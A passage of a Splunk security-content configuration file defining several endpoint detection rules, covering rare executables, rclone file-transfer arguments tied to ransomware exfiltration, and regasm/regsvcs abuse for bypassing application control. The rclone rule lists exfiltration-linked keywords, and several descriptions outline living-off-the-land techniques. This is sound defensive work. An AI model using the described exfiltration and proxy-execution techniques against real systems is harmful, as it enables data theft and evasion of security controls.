These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some legitimate processes may be only rarely executed in your environment. As these are identified, update `rare_process_allow_list_local.csv` to filter them out of your search results. action.escu.creation_date = 2022-11-10 action.escu.modification_date = 2022-11-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Rare Executables - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Unusual Processes", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect Rare Executables - Rule action.correlationsearch.annotations = {"analytic_story": ["Unusual Processes", "Rhysida Ransomware"], "cis20": ["CIS 10"],
"confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.dest) as dest values(Processes.user) as user min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.process_name | rename Processes.process_name as process | `filter_rare_process_allow_list` | sort count | head 30 | rex field=user "(?<user_domain>.*)\\\\(?<user_name>.*)" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rare_executables_filter` [ESCU - Detect RClone Command-Line Usage - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies commonly used command-line arguments used by `rclone.exe` to initiate a file transfer. Some arguments were negated as they are specific to the configuration used by adversaries. In particular, an adversary may list the files or directories of the remote file share using `ls` or `lsd`, which is not indicative of malicious behavior. During triage, at this stage of a ransomware event, exfiltration is about to occur or has already. Isolate the endpoint and continue investigating by reviewing file modifications and parallel processes. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1020"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies commonly used command-line arguments used by `rclone.exe` to initiate a file transfer. Some arguments were negated as they are specific to the configuration used by adversaries. In particular, an adversary may list the files or directories of the remote file share using `ls` or `lsd`, which is not indicative of malicious behavior.
During triage, at this stage of a ransomware event, exfiltration is about to occur or has already. Isolate the endpoint and continue investigating by reviewing file modifications and parallel processes. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited as this is restricted to the Rclone process name. Filter or tune the analytic as needed. action.escu.creation_date = 2021-11-29 action.escu.modification_date = 2021-11-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect RClone Command-Line Usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DarkSide Ransomware", "Ransomware"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to connect to a remote cloud service to move files or folders.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 35}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect RClone Command-Line Usage - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkSide Ransomware", "Ransomware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1020"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies commonly used command-line arguments used by `rclone.exe` to initiate a file transfer. Some arguments were negated as they are specific to the configuration used by adversaries. In particular, an adversary may list the files or directories of the remote file share using `ls` or `lsd`, which is not indicative of malicious behavior. During triage, at this stage of a ransomware event, exfiltration is about to occur or has already. Isolate the endpoint and continue investigating by reviewing file modifications and parallel processes.
action.notable.param.rule_title = Detect RClone Command-Line Usage action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rclone` Processes.process IN ("*copy*", "*mega*", "*pcloud*", "*ftp*", "*--config*", "*--progress*", "*--no-check-certificate*", "*--ignore-existing*", "*--auto-confirm*", "*--transfers*", "*--multi-thread-streams*") by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rclone_command_line_usage_filter` [ESCU - Detect Regasm Spawning a Process - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies regasm.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies regasm.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, limited instances of regasm.exe or regsvcs.exe may cause a false positive. Filter based on endpoint usage, command line arguments, or process lineage.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Regasm Spawning a Process - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious Regsvcs Regasm Activity", "Living Off The Land", "DarkGate Malware", "Snake Keylogger"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$; spawning a child process is typically not normal behavior for $parent_process_name$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Regasm Spawning a Process - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Regsvcs Regasm Activity", "Living Off The Land", "DarkGate Malware", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies regasm.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.
action.notable.param.rule_title = Detect Regasm Spawning a Process
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=regasm.exe by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regasm_spawning_a_process_filter`

[ESCU - Detect Regasm with Network Connection - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies regasm.exe with a network connection to a public IP address, excluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote Command And Control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies regasm.exe with a network connection to a public IP address, excluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote Command And Control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.
action.escu.known_false_positives = Although unlikely, limited instances of regasm.exe with a network connection may cause a false positive. Filter based on endpoint usage, command line arguments, or process lineage.
action.escu.creation_date = 2024-01-30
action.escu.modification_date = 2024-01-30
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Regasm with Network Connection - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $process_name$ contacting a remote destination was identified on endpoint $dest$ by user $user$. This behavior is not normal for $process_name$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Regasm with Network Connection - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies regasm.exe with a network connection to a public IP address, excluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote Command And Control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.
action.notable.param.rule_title = Detect Regasm with Network Connection
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventID=3 dest_ip!=10.0.0.0/8 dest_ip!=172.16.0.0/12 dest_ip!=192.168.0.0/16 process_name=regasm.exe | stats count min(_time) as firstTime max(_time) as lastTime by dest, user, process_name, src_ip, dest_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regasm_with_network_connection_filter`

[ESCU - Detect Regasm with no Command Line Arguments - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies regasm.exe with no command line arguments. This particular behavior occurs when another process injects into regasm.exe; in that case no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe and Regsvcs.exe are natively found in `C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe` and `C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe`.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies regasm.exe with no command line arguments. This particular behavior occurs when another process injects into regasm.exe; in that case no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe and Regsvcs.exe are natively found in `C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe` and `C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe`.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although unlikely, limited instances of regasm.exe may cause a false positive. Filter based on endpoint usage, command line arguments, or process lineage.
action.escu.creation_date = 2022-03-15
action.escu.modification_date = 2022-03-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Regasm with no Command Line Arguments - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = The process $process_name$ was spawned by $parent_process_name$ without any command-line arguments on $dest$ by $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 49}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Regasm with no Command Line Arguments - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies regasm.exe with no command line arguments. This particular behavior occurs when another process injects into regasm.exe; in that case no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe and Regsvcs.exe are natively found in `C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe` and `C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe`.
action.notable.param.rule_title = Detect Regasm with no Command Line Arguments
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where `process_regasm` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(regasm\.exe.{0,4}$)" | `detect_regasm_with_no_command_line_arguments_filter`

[ESCU - Detect Regsvcs Spawning a Process - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies regsvcs.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies regsvcs.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although unlikely, limited instances of regasm.exe or regsvcs.exe may cause a false positive. Filter based on endpoint usage, command line arguments, or process lineage.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Regsvcs Spawning a Process - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$, which is typically not normal for this process.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Regsvcs Spawning a Process - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies regsvcs.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.
action.notable.param.rule_title = Detect Regsvcs Spawning a Process
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=regsvcs.exe by Processes.parent_process_name Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regsvcs_spawning_a_process_filter`

[ESCU - Detect Regsvcs with Network Connection - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies Regsvcs.exe with a network connection to a public IP address, excluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote Command And Control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies Regsvcs.exe with a network connection to a public IP address, excluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote Command And Control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.
action.escu.known_false_positives = Although unlikely, limited instances of regsvcs.exe may cause a false positive. Filter based on endpoint usage, command line arguments, or process lineage.
action.escu.creation_date = 2024-01-30
action.escu.modification_date = 2024-01-30
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Regsvcs with Network Connection - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $process_name$ contacting a remote destination was identified on endpoint $dest$ by user $user$. This behavior is not normal for $process_name$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Regsvcs with Network Connection - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Regsvcs Regasm Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies Regsvcs.exe with a network connection to a public IP address, excluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote Command And Control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.
action.notable.param.rule_title = Detect Regsvcs with Network Connection
action.notable.param.security_domain = Endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventID=3 dest_ip!=10.0.0.0/8 dest_ip!=172.16.0.0/12 dest_ip!=192.168.0.0/16 process_name=regsvcs.exe | stats count min(_time) as firstTime max(_time) as lastTime by dest, user, process_name, src_ip, dest_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regsvcs_with_network_connection_filter`

[ESCU - Detect Regsvcs with No Command Line Arguments - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies regsvcs.exe with no command line arguments. This particular behavior occurs when another process injects into regsvcs.exe; in that case no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe and Regsvcs.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.009"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies regsvcs.exe with no command line arguments. This particular behavior occurs when another process injects into regsvcs.exe; in that case no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe and Regsvcs.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.
